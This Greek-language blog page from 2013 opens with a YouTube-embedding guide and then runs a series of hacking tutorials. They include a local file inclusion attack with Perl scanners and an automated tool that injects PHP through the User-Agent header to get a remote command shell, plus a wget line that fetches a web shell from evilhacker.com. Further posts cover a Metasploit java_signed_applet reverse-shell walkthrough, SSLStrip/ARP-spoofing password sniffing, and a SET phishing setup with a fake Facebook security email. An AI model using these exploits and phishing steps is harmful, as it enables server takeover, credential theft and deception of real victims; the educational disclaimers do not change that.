!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Κυριακή 21 Απριλίου 2013

Πως ενσωματώνω εύκολα ένα βίντεο από το youtube στο blog μας

Παρακάτω θα εξηγήσουμε πως μπορούμε εύκολα να ενσωματώσουμε ένα βίντεο από το youtube στο προσωπικό
μας blog.

Βήμα 1 -> Εύρεση βίντεο και αντιγραφή κώδικα ενσωμάτωσης

Βρίσκουμε το βίντεο που θέλουμε στο youtube και πατάμε το κουμπί “Αποστολή” και στη συνέχεια το κουμπί “Ενσωμάτωση”. Το αποτέλεσμα πρέπει να είναι παρόμοιο με το παρακάτω:

Τέλος, αντιγράφουμε ό,τι υπάρχει μέσα στο πλαίσιο (στην εικόνα φαίνεται επιλεγμένο – μπλε χρώμα).

Βήμα 2) -> Δημιουργία gadget στο blog

Πηγαίνουμε στο blog μας (έχοντας κάνει login με τα στοιχεία μας) και πατάμε το κουμπί “Σχεδίαση” πάνω δεξιά. Έπειτα, αν έχουμε την νέα διεπαφή του blogger, επιλέγουμε την “Διάταξη” στην αριστερή στήλη και στη συνέχεια πατάμε “Προσθήκη gadget” στο μέρος της σελίδας όπου θέλουμε να προσθέσουμε το βίντεο. (Αν έχουμε την παλιά διεπαφή, πατάμε κατευθείαν ”Προσθήκη gadget”)
Στο παράθυρο που εμφανίζεται βρίσκουμε το gadget με όνομα “HTML/JavaScript” και πατάμε το μπλε + στα δεξιά του. Στο νέο παράθυρο που εμφανίζεται, βάζουμε (αν θέλουμε) ένα τίτλο της αρεσκείας μας και στη συνέχεια στο άδειο πλαίσιο επικολλούμε το κομμάτι που είχαμε αντιγράψει από το youtube και πατάμε “ΑΠΟΘΗΚΕΥΣΗ”.
Επιστρέφοντας στην σχεδίαση πατάμε “ΠΡΟΕΠΙΣΚΟΠΗΣΗ” για να δούμε τι αποτέλεσμα θα έχουμε στη σελίδα του blog μας.

Βήμα 3) -> Έλεγχος/Αλλαγή μεγέθους

Με το πάτημα του κουμπιού “ΠΡΟΕΠΙΣΚΟΠΗΣΗ” πιθανότατα θα δούμε το βίντεο που ενσωματώσαμε να φαίνεται στο blog μας, αλλά όχι με τις σωστές διαστάσεις. Αυτό συμβαίνει γιατί οι διαστάσεις των τμημάτων του blog μας είναι προκαθορισμένες και είναι δύσκολο να τις αλλάξουμε. Πιο εύκολο είναι να αλλάξουμε όμως το μέγεθος του βίντεο που ενσωματώνουμε.
Γυρίζουμε στο παράθυρο της Σχεδίασης (που δεν έχει κλείσει) και πατάμε το κουμπί “Επεξεργασία” πάνω στο gadget που περιέχει το βίντεο. Στο παράθυρο που ανοίγει εντοπίζουμε τα width=”xxx” height=”xxx” (όπου xxx οι τιμές που έχουν οι 2 παράμετροι) και αλλάζουμε τις τιμές τους ανάλογα με το ποια διάσταση θέλουμε να μεταβάλλουμε.
Πατάμε “ΑΠΟΘΗΚΕΥΣΗ” και στη συνέχεια “ΠΡΟΕΠΙΣΚΟΠΗΣΗ” για να δούμε το αποτέλεσμα.
Επαναλαμβάνουμε την παραπάνω διαδικασία μέχρι το βίντεο να εμφανίζεται στο μέγεθος που επιθυμούμε.

Βήμα 4) -> Αποθήκευση αλλαγών.

Στο παράθυρο της σχεδίασης πατάμε το κουμπί “ΑΠΟΘΗΚΕΥΣΗ” ώστε να αποθηκευτούν οι αλλαγές που έχουμε κάνει. Στη συνέχεια, πατώντας το κουμπί “Προβολή ιστολογίου” μπορούμε να δούμε το blog μας όπως το βλέπουν πλέον και οι υπόλοιποι χρήστες.

LFI (Local File Inclusion)...

Γειά σας, μετά από αρκετό καιρό απουσίας γυρίσαμε και πάλι με νέα tutorials και δημοσιεύσεις. Σε αυτό το tutorial θα αναλύσουμε ένα τρόπο επίθεσης εξίσου σημαντικό για την κατάληψη ενός server. Ο τρόπος αυτό είναι παρόμοιος με την επίθεση RFI που είχαμε προαναφέρει σε παλιότερο άρθρο. Η εισαγωγή που θα κάνω για να ξεκινήσω αυτό τον τύπο επίθεσης είναι ένα πολύ σύντομο και παλιό ρητό... "Τα μεγάλα κάστρα πέφτουν από μέσα"...
Σύμφωνα με προηγούμενο άρθρο η επίθεση RFI (Remote File Inclusion) είναι ένας τύπος επίθεσης σε server όπου δηλαδή, κάποιος επιτιθέμενος μπορεί να εκτελεί κώδικα σε ένα απομακρυσμένο site μέσω ενός .php /.asp shell που “φιλοξενείται” σε δικό του server. Διαβάζοντας τον τίτλο LFI (Local File Inclusion) θα μπορούσε να πει κανείς ότι η επίθεση αυτή είναι ίδια σχεδόν με την RFI με την μόνη διαφορά ότι η επίθεση Local File Inclusion εμφανίζει αρχεία μέσα απ’ τα τον server.
Αν είχαμε ένα site που είχε πρόβλημα με τις επιθέσεις RFI η επίθεση θα γινόταν έτσι:

Ενώ ένα site ευπαθές σε LFI επιθέσεις, θα έχει την εξής σύνταξη:

http://www.site.com/index.php?page=../../../../../../../etc/passwd

Ας δούμε τι είναι μια επίθεση τύπου LFI και που οφείλετε μια τέτοια αδυναμία. Όλα αρχίζουν και τελειώνουν εδώ για τον απρόσεχτο προγραμματιστή!

<?php
$page = $_GET[page];
include ($page);
?>

Όπως μπορεί να καταλάβει ο καθένας (ή περίπου ο καθένας), αυτό είναι ένα ευπαθές κομμάτι PHP κώδικα που δεν πρέπει ΠΟΤΕ να χρησιμοποιηθεί κατά τη δημιουργία μια σελίδας. Το include() δεν ελέγχετε πουθενά και αφήνει τα δεδομένα να “περνούν” στο site χωρίς πρώτα, να φιλτραριστούν με κάποιο τρόπο!
Mια ενδιαφέρουσα ανακάλυψη -μέσω του LFI- θα ήταν το αρχείο /etc/passwd/ αφού, μέσω της επίθεσης LFI μπορούμε να διαβάσουμε αρχεία μεσα απ’ το server. Αν στη σελίδα index.php?page=news.php αντικαταστήσουμε το “news.php” με “../../../../../../../../../etc/passwd“, θα έχουμε στα χέρια μας το αρχείο “/etc/passwd/“.

Προσοχή: Μιλάμε πάντα για ένα site το οποίο είναι ευπαθές σε επίθεση LFI! Βέβαια και αυτά τα στοιχεία να πάρουμε μπορούν να χαρακτηριστούν ως άχρηστα αφού είναι κωδικοποιημένα (με x) και ο μόνος τρόπος να τα σπάσουμε είναι να αποκτήσουμε πρόσβαση στο directory “/etc/shadow” το οποίο ΠΟΤΕ δεν είναι προσβάσιμο για το ευρύ “κοινό” αφού είναι only Readable / Writeable απ’ τον root.
Κάπως έτσι άδοξα λοιπόν, θα τέλειωνε η ‘καριέρα’ ενός skript kiddie (αφού πρώτα είχε κάνει φιγούρα σε γνωστούς, φίλους, ξαδέρφια και μακρινούς συγγενείς!!). Άρα, αν φτάσουμε μέχρι εδώ και το παρατήσουμε, θα συμφωνήσω ΑΠΟΛΥΤΑ με τους επικριτές του LFI, ότι αποτελεί μια άχρηστη τεχνική.
Τι θα γινόταν αν συνδικαζόταν κάπως αλλιώς;
Τα βήματα που ακολουθούν είναι και τα ρεαλιστικά βήματα που θα ακολουθούσε κάποιος κακόβουλος hacker ώστε να πάρει την πλήρη έλεγχο ενός site.

Το Χρονικό μιας επίθεσης.

Βήμα 1


Όπως όλοι μας γνωρίζουμε, ένα απ’ τα πιο δυνατά εργαλεία στα χέρια των hackers είναι η μηχανή αναζήτησης Google αφού ουσιαστικά τους λύνει τα χέρια με μερικές πληκτρολογήσεις (το μόνο που θέλει είναι εξοικείωση πάνω στον τρόπο που θέτουμε τα ζητούμενα.Ας επιστρέψουμε στο θέμα μας, το οποίο είναι το LFI και πως θα μπορούσε κάποιος να βρει vulnerable (σε  LFI) site μέσω του google.

Γράφοντας:

inurl:index.php?page=

ή

inurl:main.php?pg=
…και τα λοιπά…
Φυσικά μπορούμε να αλλάξουμε τα δεδομένα που έχουμε θέσει προς αναζήτηση… ανάλογα με τις απαιτήσεις και τις ανάγκες μας.

Βήμα 2

Αφού βρει κάποιος ένα site το οποίο είναι ευάλωτο σε επιθέσεις LFI σίγουρα διαπίστωσε ότι το συγκεκριμένο κενό ασφαλείας δίνει την δυνατότητα να ανάγνωσης του αρχείου “/etc/passwd”. Σειρά σε κάθε επίθεση έχει η εύρεση ή η δημιουργία ενός προγράμματος αυτοματοποιημένης εκμετάλλευσης του κενού ασφαλείας που βρήκαμε. Στην περίπτωση μας θα γράψουμε μόνοι μας όλα τα προγράμματα που θα χρησιμοποιήσουμε μιας και δημιουργώντας τα προγράμματα που χειριζόμαστε κατανοούμε καλύτερα το κενό ασφάλειας που εκμεταλλευτήκαμε.

01#!/usr/bin/perl
02
03use LWP::UserAgent;
04use HTTP::Request;
05
06print "\n(c) totalXaker magazine \n";
07print "LocalFI Directory scanner [mr.pr0n]\n";
08# Eisagwgh twn dedomenwn
09print "Host: ";
10print "[Ex: www.xxx.org ]:";
11chop ($host = );
12$host = "http://".$host if ($host !~ /^http:/);
13print "Enter path:";
14print "[Ex: xxx.php?xxx= ]:";
15chop ($path = );
16{
17        $ext="../../../../../../../../../../../../../../etc/passwd";
18        $lfi=$host."/".$path.$ext;
19        print "$lfi\n\n";
20        $useragent = LWP::UserAgent->new;
21        $request=HTTP::Request->new(GET=>$lfi);
22        $scnpg = $useragent->request($request)->as_string;
23        # Elegxos gia thn le3ei pou periexei ta grammata root
24        if ($scnpg=~/root/)
25        {
26                print "Woow ",$host," is Vulnerable!\n";
27        }
28        else
29        {
30                print "PFF.. ",$host," is NOT Vulnerable!\n";
31        }
32}

Ασ’ πούμε λίγα λόγια για τον παραπάνω κώδικα! Το scriptaki όπως μπορούμε να διαπιστώσουμε, δεν κάνει κάτι το ιδιαίτερο απλά μας βγάζει απ’ τον κόπο της χειρωνακτικής εκτέλεσης του LFI test για το αν το συγκεκριμένο site (που έχουμε βάλει στο μάτι) έχει πρόβλημα τύπου LFI η όχι και συγκεκριμένα αν έχει προσβάσιμο προς το κοινό το “/etc/passwd”.Όταν βρει το /etc/passwd (αν υπάρχει!) θα ψάξει τα περιεχόμενα της σελίδας για να βρει τη λεξη root

if ($scnpg=~/root/)


Ο λόγος που βάλαμε τη λέξη root είναι απλός και σίγουρα κατανοητός. Κάθε “/etc/passwd” που σέβεται τον εαυτό του αναφέρει στην αρχή του την λέξη root. Φυσικά μπορείτε το root να το αντικαταστήσετε με home ή να το προσθέσετε και αυτό στο scannarisma για μεγαλύτερη αξιοπιστία στο αποτέλεσμα. Σε περίπτωση που μας εμφανίσει το μήνυμα “Woow http://www.site.com is Vulnerable“, τότε είμαστε σε καλό δρόμο αλλιώς. Άλλη μια παράμετρος η οποία θα μπορούσε να προστεθεί στο scanneraki μας για έλεγχο είναι το Nullbyte ():

http://www.site.com/index.php?file=../../../../../../../../ etc/passwd


Έχουν υπάρξει φορές που ενώ ζητάμε από ένα site να μας εμφανήσει το αρχείο “/etc/passwd”, εκείνο είτε δεν μας το εμφανίζει, είτε μας εμφανίζει μηνύματα λάθους όπως στο παράδειγμα :

Warning: main(/etc/passwd.inc): failed to open stream: No such file or directoryectory in /var/www/htdocs/index1.php on line 199
Warning: main(): Failed opening '/etc/passwd.inc' for inclusion (include_path='.:/usr/lib/php') in /var/www/htdocs/index1.php on line 199


Ενώ, όταν βάλουμε /etc/passwd μας εμφανίζει κανονικά /etc/passwd. Η μέθοδος αυτή λέγετε αλλιώς και Null poison attack. Κάτι τέτοιο είναι πολύ εύκολο να προστεθεί στον κώδικα μας, απλά προσθέτοντας μερικές γραμμές ακόμα. Μετά την γραμμή 29 μπορούμε να προσθέσουμε τον παρακάτω κώδικα.

Null poison Attack Code:

01print "Tryin' to LFI with NullByte ()\n";
02{
03$ext2="../../../../../../../../../../../../../../etc/passwd";
04$byte=$host."/".$path.$ext2;
05print "$byte\n\n";
06$useragent = LWP::UserAgent->new;
07$request=HTTP::Request->new(GET=>$byte);
08$scnpg = $useragent->request($request)->as_string;
09if ($scnpg=~/root/)
10{
11        print "Woow ",$host," is Vulnerable with !\n";
12}
13else
14{
15        print "PFF.. ",$host," is NOT Vulnerable AGAIN!!\n";
16}
17
18}

Στην Εικόνα βλέπουμε ένα site που με ευκολία μας δείχνει όλα του τα “ευαίσθητα” προσωπικά δεδομένα “/etc/passwd”. Καλό σημάδι για έναν εισβολέα..Κακό για τον admininstrator.

Βήμα 3ο

Στα προηγούμενα δύο βήματα ανακαλύψαμε ένα site το οποίο έχει πρόβλημα στο πως δέχεται τα δεδομένα, και αβίαστα εμφανίζει αρχεία μέσα που σε καμία περίπτωση δε θα έπρεπε να βλέπαμε. Το directory που θα χρησιμοποιήσουμε για τα παραδείγματα μας στη συνέχεια του άρθρου, δέν θα είναι το “/etc/passwd” αλλά το “/proc/self/environ/“.
Στην περίπτωση που θέλουμε να αυτοματοποιήσουμε την συγκεκριμένη διαδικασία -δηλαδή να ψάχνει για το directory “proc/self/environ”- απλα αλλάζουμε το directory που scannάραμε στο προηγούμενο βημα καθώς επίσης και το if ($scnpg=~/root/) σε if ($scnpg=~/HTTP_USER_AGENT/) και είμαστε έτοιμοι ;)
Βλέπουμε στα στοιχειά που περιέχει το “/proc/self/environ/” αναφέρει και τα στοιχεία του User Agent μας.

Mozilla/5.0 (X11; U; Linux i686; el-GR; rv:1.9.0.3) Gecko/2008092510 Iceweasel/3.0.1 (Debian-4.0.1-2)

Εδώ βλέπουμε μερικά στοιχεία που μας αποκαλύπτει το /proc/self/environ/.Στο οποίο θα προσπαθήσουμε να πάρουμε πρόσβαση.. Τώρα το πως, αποτελεί ένα αίνιγμα που θα ξετυλιχτεί λίγο-λίγο μπροστά στα μάτια σας.
Μας ήρθε μια σατανική ιδέα! Αφού δείχνει τα στοιχεία του User Agent μας σαν στοιχεία του site, θα δοκιμάσουμε, να αλλάξουμε τα στοιχεία αυτά με μια εντολή που μας δίνει για παράδειγμα τη λίστα όλων των περιεχομένων του κατάλογου όπου βρισκόμαστε! Στο linux είναι η εντολή ls.
Για να υλοποιήσουμε την σατανική μας ιδέα θα χρειαστούμε το Extension για τον FireFox με το όνομα Tamper Data.
Το tamper data εν δράση!

Βήμα 4ο

Αφού εγκατασταθεί το extencion Tamper Data το βάζουμε σε λειτουργία
Το ανοίγουμε το site μας πάμε στην καρτέλα του Tamper Data, πατάμε start Tamper Data και κάνουμε refresh το site. Οταν μας εμφανιστεί αυτό που βλέπουμε στην εικόνα 3 πατάμε “tamper” και θα μας βγάλει στο το menu το οποίο φαίνεται στην εικόνα 4 και αλλάζουμε τα στοιχεία του User Agent με την εντολη ls -la, αλλά όχι έτσι απλά. H ολοκληρωμένη μορφή της εντολής θα πρέπει να είναι η ακόλουθη:

1<? system("ls -la");?>
Αλλάζουμε τα στοιχεία του User Agent στο συγκεκριμένο πεδίο με την εντολή. Αν όλα πάνε καλά μας περιμένει μια έκπληξη.
Ο λόγος που γράφουμε έτσι την εντολή είναι απλός. Προσπαθούμε να κοροϊδέψουμε το site ώστε να πιστέψει ότι και η εντολή μας είναι μέρος του κώδικα!

Βήμα 5ο

Αφού ακολουθήσαμε πιστά τις οδηγίες του όρθρου, κάνουμε refresh! Και…boom! ΟΛΑ τα δεδομένα του συγκεκριμένου καταλόγου.

Όλα τα αρχεία που εμπεριέχονται στον συγκεκριμένο κατάλογο.. είναι ορατά σε έναν όχι και τόσο εξουσιοδοτημένο χρήστη!

Αν δεν καταλαβαίνετε τη λέει η λίστα, μπορείτε και κοιτάξετε τον πηγαίο κώδικα της σελίδας και αυτό που θα δείτε θα είναι κάπως …ετσι...

Μια πιο εύκολα αναγνώσιμη μορφή των δεδομένων της σελίδας!!

Βήμα 6ο

Αφού πήραμε μια γεύση για το τη μπορούμε να κάνουμε με το LFI, ας δούμε όμως μέχρι που μπορούμε να το φτάσουμε. Λοιπόν, ας αντικαταστήσουμε την προηγούμενη εντολή με μια λίγο διαφορετική. Αλλά βασισμένη στην ίδια λογική! Θα ανεβάσουμε σε δικο μας έναν server ένα shellakι όπως αυτά που χρησιμοποιούνται στις αντεπιθέσεις RFI.  Όταν γίνει αυτό βάζουμε το server-θυμα να το κατεβάσει στα αρχεία του με την εντολή wget!

1<?php system("wget www.evilhacker.com/shell.txt; mv shell.txt hacked.php");?>

Με την παραπάνω εντολή, αναγκάζουμε το σύστημα να κατεβάσει -μέσω του “wget”- το shell.txt και μετά με την εντολή “mv” αλλάζουμε το όνομα από shell.txt σε hacked.php.
Πάμε στη σελίδα “/hacked.php”.

Το σύστημα είναι πλέων owned :) Και χωρίς καν να ιδρώσουμε!

Βήμα 7ο

Αφού κατανοήσαμε τον τρόπο με τον οποίο λειτουργεί η συγκεκριμένη επίθεση, σειρά έχει να γράψουμε ένα αυτοματοποιημένο εργαλείο το οποίο να μας επιστρέφει shell, ώστε να μην χρειάζεται να κάνουμε όλη την προαναφερθείσα διαδικασία.

01#!/usr/bin/perl
02
03use LWP::UserAgent;
04use HTTP::Request;
05
06print "\n(c) totalXaker magazine \n";
07print "LocalFI Automatic Ownage Tool [mr.pr0n]\n";
08print "Host: ";
09print "[Ex: www.xxx.org ]:";
10chop ($host = );
11$host = "http://".$host if ($host !~ /^http:/);
12print "Enter path:";
13print "[Ex: xxx.php?xxx= ]:";
14chop ($path = );
15{
16        $ext="../../../../../../../../../../../../../../../../../../../proc/self/environ";
17        $lfi=$host."/".$path.$ext;
18        print "$lfi\n\n";
19        $useragent = LWP::UserAgent->new;
20        print ":~# ";
21        while( $cmd = )
22        {
23                chop($cmd);
24                # Allazoyme ta stoixeia tou User Agent me oti 8eloume emeis
25                $useragent->agent("data<!--?php system('$cmd');?-->data");
26                $response = $useragent->get( $lfi );
27                # Osa stoixeia emfanistikan ap thn entolh, anagrafonte sto termatiko
28                if ($response->content =~ /data(.*)data/s)
29                {
30                        print $1;
31                }
32                print ":~# ";
33        }
34}

Τα αποτελέσματα και η χρήση του προγράμματος που γράψαμε είναι εμφανέστατα εικονα...

Το μικρο μας -όχι τόσο αθώο- προγραμματάκι έχει βάλει δυνατά του να μας βγάλει ασπροπρόσωπους και τα κατάφερε μια χαρά αφού πήραμε cmd μέσα στον server-στόχο. Πόσο χειρότερα για τον Admin θα μπορούσαν να είναι τα πράγματα?

Επίλογος

Όπως θα διαπιστώσατε στις εικόνες, τα στοιχεία του site είναι καλυμμένα ως έναν αρκετά ικανοποιητικό βαθμό, ώστε να αποφευχθούν οι επιθέσεις από ανώριμα script kiddies τα οποία το μόνο που θα ενδιαφερθούν είναι να κάνουν ενα deface στο server χωρίς καν να καταλάβουν πως έγιναν όλα αυτά.
Όπως είναι φυσικό και επόμενο το shell “hacked.php” που είχα ανεβάσει, έχει σβηστεί απ’τον server καθώς επίσης δεν έχει πειραχτεί κανένα μα κανένα αρχείο. H γνώση δείχνει δύναμη.. ενώ η επίδειξη της δύναμη με σκοπό την καταστροφή δείχνει απλά την μετριότητα.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Πέμπτη 7 Μαρτίου 2013

Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3


Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :
1. Metasploit Framework
2. Operating System(Προτείνω Linux OS ή Backtrack 5)

Βήμα προς Βήμα:
Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|


Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:

use exploit/multi/browser/java_signed_applet <-| (φορτίζουμε το java_signed_applet exploit)
set payload windows/meterpreter/reverse_tcp <-| (ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)

Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...

Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|
set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)
set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)
set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 <-| (η διεύθυνση μας)
set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)
exploit <-| (έναρξη έκθεσης...)

Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.
Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:

Terminal: session -l <-| (για να δω τα ενεργά session)
Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..
session -i <-|
Τέλος μας εμφανίζει στην οθόνη meterpreter> που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τρίτη 5 Μαρτίου 2013

"Ψάρεμα" κωδικών λογαριασμών HTTPS/SSL σελίδων με SSLStrip και ARPSpoof

Γειά σας... Πριν λίγες μέρες έφτιαξα ένα tutorial για το πως ψαρεύουμε κωδικούς πρόσβασης από ένα LAN δίκτυο χρησιμοποιώντας το social engineering tool του Backtrack 5. Σήμερα σε αυτό το tutorial θα σας δείξω πώς να ψαρέψετε κωδικού πρόσβασης από σελίδες με καταλλήξεις https/ssl δηλαδή σελίδες που είναι προστατευμένες με το πρωτόκολλο SSL. Αυτή η τεχνική μπορεί να εφαρμοστεί σε ασύρματα και ενσύρματα δίκτυα. Είναι ουσιαστικά μια ΜΙΤΜ επίθεση και για να πραγματοποιηθεί πρέπει να έχουμε ένα κομβικό σημείο για παράδειγμα ένα router (ασύρματο/ενσύρματο) που να χρησιμοποιήται από πολλούς χρήστες.
Τα εργαλεία που θα χρησιμοποιηθούν είναι το SSLStrip, arpspoof και φυσικά το Backtrack 5 R3.



Αν δεν έχουμε εγκατεστημένο το SSLStrip τότε:

1) Ανοίγω ένα τερματικό και εισάγω: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/3.jpg

2) Στη συνέχεια αποσυμπιέζω το αρχείο που κατέβασα γράφοντας: tar zxvf sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/4.jpg

3) Ανοίγω το φάκελο που αποσυμπίεσα το αρχείο: cd sslstrip-0.9
4) Τέλος κάνω εγκατάσταση γράφοντας: python setup.py install

http://zyphyto1.host56.com/sslstrip/6.jpg

1) Ανοίγω νέο τρματικό και γράφω την παρακάτω εντολή έτσι ώστε να ορίσω τη θύρα που θα στέλνονται τα δεδομένα: echo ’1′ > /proc/sys/net/ipv4/ip_forward 

http://zyphyto1.host56.com/sslstrip/1.jpg

2) Βρισκω την ΙΡ του router: netstat -nr

http://zyphyto1.host56.com/sslstrip/2.jpg

3) Στη συνέχεια ορίζω τα iptables στη θύρα 8080: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 

http://zyphyto1.host56.com/sslstrip/7.jpg

4) Αρχίζω να κάνω arpspoofing ή αλλιώς δημιουργώ κίνηση στο router δηλητηριάζοντας το έτσι ώστε να κάνω ΜΙΤΜ επίθεση: arpspoof -i wlan0 192.168.0.1 (Αντικαθιστώ το wlan0 με τον τύπο της σύνδεσης και σαν ΙΡ δίνω την ΙΡ της Gateway που μου δώθηκε όταν έβαλα στο τερματικό την εντολή  netstat -nr

http://zyphyto1.host56.com/sslstrip/8.jpg

5) Τέλος ενεργοποιώ το sslstrip: sslstrip -l 8080

http://zyphyto1.host56.com/sslstrip/9.jpg

6) Επομένως αυτό που έχουμε είναι 2 τερματικά όπου στο ένα τρέχει το sslstrip και στο άλλο το arpspoof

http://zyphyto1.host56.com/sslstrip/12-%20sitandwait.jpg

7) Αν επιθυμώ να μου εμφανίζεται στο τερματικό η κίνηση του δικτύου γράφω: tail -f sslstrip.log 

http://zyphyto1.host56.com/sslstrip/16-logfiletail.jpg

http://zyphyto1.host56.com/sslstrip/17-3screens.jpg

8) Όταν οι χρήστες του δικτύου ανοίξουν οποιαδήποτε σελίδα στην οποία δίνουν username/password τότε αυτομάτως εμφανίζονται στην οθόνη μας. Επίσης αν δεν εμφανίζονται κωδικοί στην οθόνη μπορούμε να μεταβούμε στο φάκελο του sslstrip και να βρούμε ένα αρχείο name.log όπου θα εμφανίζεται εκεί η κίνηση του δικτύου.

http://zyphyto1.host56.com/sslstrip/passwords%20recieved.jpg

ΣΗΜΕΙΩΣΗ:
Για τυχόν errors που θα εμφανιστούν πιθανόν στο τερματικό σας μη δώσετε σημασία. Δεν υπάρχει κανένα πρόβλημα είναι φυσιολογικό. Απλά κάθε φορά έχετε το νού σας για αναβαθμίσεις του sslstrip στη σελίδα του έτσι ώστε να έχετε ενημερωμένες εκδόσεις του.

http://zyphyto1.host56.com/sslstrip/14-error.jpg

Επίσης το sslstrip δεν μπορεί να δουλέψει τόσο καλά με browsers όπως ο Mozilla και το Google Chrome και όπως επίσης με site ειδικά με το Gmail.

Τρόποι προστασίας:
  • Θα πρέπει να αποφεύγουμε να μπαίνουμε σε site όπου δίνουμε κωδικούς πρόσβασης σε δίκτυα ασύρματα/ ενσύρματα που δεν είναι ασφαλή όπως τα ασύρματα δίκτυα μιας καφετέριας ενός internet cafe κτλ.
  • Επίσης θα πρέπει όταν είμαστε σε τέτοια δίκτυα και όταν μπούμε στη σελίδα και πάμε να δώσουμε τον κωδικό πρόσβασης πάντα μα πάντα να ελέγχουμε πάνω στο σύνδεσμο να γράφει: https://............ αυτό είναι η πιστοποίηση για την εγκυρότητα του site. Μας λέει δηλαδή οτι δεν είναι πλαστό και οτι δε χρησιμοποιεί κάποιος μια πλαστή σελίδα έτσι ώστε να μας αποσπάσει κωδικούς.
  • Τέλος, είναι πολύ σημαντικό να προσέχουμε οτιδήποτε περίεργο μας εμφανιστεί ή οποιαδήποτε περίεργη συμπεριφορά προκύψει κατα τη διάρκεια φόρτωσης της οποιαδήποτε σελίδας και του δικτύου.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Δευτέρα 4 Μαρτίου 2013

Credential Harvester Attack Method (LAN) - Backtrack 5 R3 Tutorial

Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector

Με το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά χρησιμοποιώ το Harvester Attack Vector.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...

Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook account health. Please update your account so that we present it for hacking attacks. Please follow the link below to update your account.



http://(my ip address)
Regards
^C ↵ (Ctrl + C)

Αυτό που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το λογαριασμό του.
